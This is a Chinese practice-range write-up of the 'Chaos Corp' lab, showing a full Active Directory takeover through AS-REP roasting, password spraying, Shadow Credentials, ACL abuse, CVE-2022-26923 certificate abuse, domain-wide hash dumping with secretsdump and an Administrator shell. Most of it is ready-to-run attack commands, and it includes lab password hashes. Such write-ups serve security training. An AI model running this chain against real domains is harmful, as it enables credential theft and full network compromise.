无境靶场-Chaos Corp WP

鞣谘坡 2026-1-29 17:44

无境靶场：vip.bdziyi.com/ulab

扫描

该机器有极大可能为DC

匿名获取信息

匿名枚举用户

[code]

nxc smb 192.168.111.10 -u ' ' -p '' --users

[/code]

尝试其他方法

[code]

impacket-lookupsid ' ':''@192.168.111.10 -no-pass

[/code]

获取到以下用户

匿名枚举共享

[code]

nxc smb 192.168.111.10 -u ' ' -p '' --shares

[/code]

访问匿名共享 New

[code]

smbclient //192.168.111.10/New -U ' '%''

[/code]

以 GBK 编码查看文件获取到一个新员工账户

域信息收集

bloodhound 信息收集

Kali 默认没有安装 bloodhound，可以根据下面的文档安装

bloodhound | Kali Linux Tools

[code]

bloodhound-python -c All -u newmht -p 'New@1234' -ns 192.168.111.10 -d sec.org -dc ad.sec.org --zip

[/code]

但是这个账号没有利用的东西

asreproast

经过详细的查找，找到了一个用户可以进行 asreproast

[code]

nxc ldap 192.168.111.10 -u newmht -p 'New@1234' --asreproast ASREPROAST --kdcHost 192.168.111.10

[/code]

进行密码爆破

[code]

john --wordlist=/usr/share/wordlists/rockyou.txt ASREPROAST

[/code]

这个账户属于人事部，但是也没有见到利用的路径，只能尝试一下密码喷射域内所有的用户，幸运地获取到 Moly 的密码

[code]

nxc smb 192.168.111.10 -u users.txt -p 'mahalkita'

[/code]

Shadow Credentials

分析 Moly，发现 Moly 对开发部这个安全组有 WriteOwner 的权限

暂时考虑为 Shadow Credentials，但是还得看是否满足下面的4个条件

回头看扫描结果，发现有636端口，尝试访问域控证书的端点

[code]

curl -k http://192.168.111.10/certsrv/

[/code]

共享也可以看到开放了证书服务

再看一下系统版本，有可能是 Windows Server 2016

剩下的条件：

能改变某个账号的msDS-KeyCredentialLink属性，就能获得这个账号的TGT和NTLM Hash

[code]

certipy-ad find -u 'Moly@sec.org' -p 'mahalkita' -dc-ip 192.168.111.10 -vulnerable

[/code]

从结果来看好像没有什么有用的信息，那就直接利用试试

[code]

# 修改权限
impacket-dacledit \
  -action write \
  -rights WriteMembers \
  -principal 'Moly' \
  -target-dn 'CN=Dev,DC=sec,DC=org' \
  -dc-ip 192.168.111.10 \
  'sec.org/Moly:mahalkita'

[/code]

[code]

# 将 Moly 加入 开发部 这个组
bloodyAD --host 192.168.111.10 -d sec.org -u Moly -p 'mahalkita' set owner '开发部' Moly

[/code]

[code]

certipy-ad shadow auto -u Moly@sec.org -p mahalkita -dc-ip 192.168.111.10 -account Cook

[/code]

先关闭虚拟机的时间同步，再同步域控时间

请求失败是因为域控和Kali时间差距过大，需要从域控同步时间

[code]

# 同步域控时间
ntpdate -4 -b 192.168.111.10
# 再次请求
certipy-ad shadow auto -u Moly@sec.org -p mahalkita -dc-ip 192.168.111.10 -account Cook

[/code]

如果还是不行，可以尝试

[code]

apt install chrony -y
# 编辑配置，取消 pool的注释
vim /etc/chrony/chrony.conf
server 192.168.111.10 iburst
systemctl restart chrony

# 检查源状态
chronyc sources -v
# 手动强制同步
ntpdate -4 -b 192.168.111.10 # 也可以一起使用
chronyc makestep
chronyc tracking

[/code]

同步成功的判断

[code]

# 同步需要点时间，大概三分钟
# chronyc tracking 显示 MS Name（192.168.111.10）一致
# Last 接近 0

[/code]

ACL 滥用

Cook 对 Jock 有 ForceChangePassword 的权限

先利用 Cook 的 hash 修改 Cook 自身的里面

[code]

impacket-changepasswd -hashes :8ac71e8fdb3f7468c3b0d80611dee7e4 sec.org/Cook@192.168.111.10 -newpass '123456'

# 修改 Jock 的密码为 123456
net rpc password "Jock" -U "sec.org"/"Cook"%"123456" -S 192.168.111.10

[/code]

Jock 对 MHT 有 GenericAll 权限

[code]

# 修改 mht 的密码为 123456
net rpc password mht -U 'sec.org'/'Jock'%'123456' -S 192.168.111.10

[/code]

但是到 MHT 这里，利用的线索又断开了

Certificate Services

mht的线索断开了，但是先尝试使用 Moly 的密码来请求域证书

查找 CA 名称

[code]

certipy-ad find -u 'Moly@sec.org' -p 'mahalkita' -target 192.168.111.10

[/code]

请求证书

[code]

certipy-ad req -u 'Moly@sec.org' -p 'mahalkita' -target 192.168.111.10 -ca sec-AD-CA -template User

[/code]

最后逐个尝试，只有 mht 能正常请求证书

[code]

certipy-ad req -u 'mht@sec.org' -p '123456' -target 192.168.111.10 -ca sec-AD-CA -template User

[/code]

只能考虑是否有 ADCS 权限提升漏洞

CVE-2022-26923

查询是否可以创建计算机账户

[code]

ldapsearch -x -H ldap://192.168.111.10 -D 'mht@sec.org' -w '123456' -b 'DC=sec,DC=org' -s base ms-DS-MachineAccountQuota

[/code]

添加计算机账户

[code]

impacket-addcomputer 'sec.org/mht:123456' -computer-name 'cve' -computer-pass 'cve@123456' -dc-ip 192.168.111.10

[/code]

修改 dNSHostName

[code]

bloodyAD -d sec.org -u mht -p '123456' --host 192.168.111.10 set object 'CN=cve,CN=Computers,DC=sec,DC=org' dNSHostName -v 'ad.sec.org'

[/code]

请求 AD$ 的证书

[code]

certipy-ad req -u 'cve$@sec.org' -p 'cve@123456' -target 192.168.111.10 -ca sec-AD-CA -template Machine -ldap-scheme ldap

[/code]

证书传递

[code]

certipy-ad auth -pfx ad.pfx -dc-ip 192.168.111.10

[/code]

导出域内所有哈希

[code]

impacket-secretsdump 'sec.org/AD$@192.168.111.10' -hashes :af09c873164ed481ecf0f6230966d0ad -target-ip 192.168.111.10 -just-dc

[/code]

[code]

impacket-wmiexec -hashes :6f4009ffe6f419f6ebef8c5c4495f26f 'sec.org'/Administrator@192.168.111.10 -target-ip 192.168.111.10 -codec gbk

[/code]

当然 ESC4 + ESC1 也可以利用

[code]

certipy-ad template -u 'mht@sec.org' -p 'CEO@Hacked123' -dc-ip 192.168.111.10 -template 'User' -write-default-configuration

certipy-ad req -u mht@sec.org -p 'CEO@Hacked123' -dc-ip 192.168.111.10 -ca 'sec-AD-CA' -template 'User' -upn 'administrator@sec.org' -target 192.168.111.10

[/code]
来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！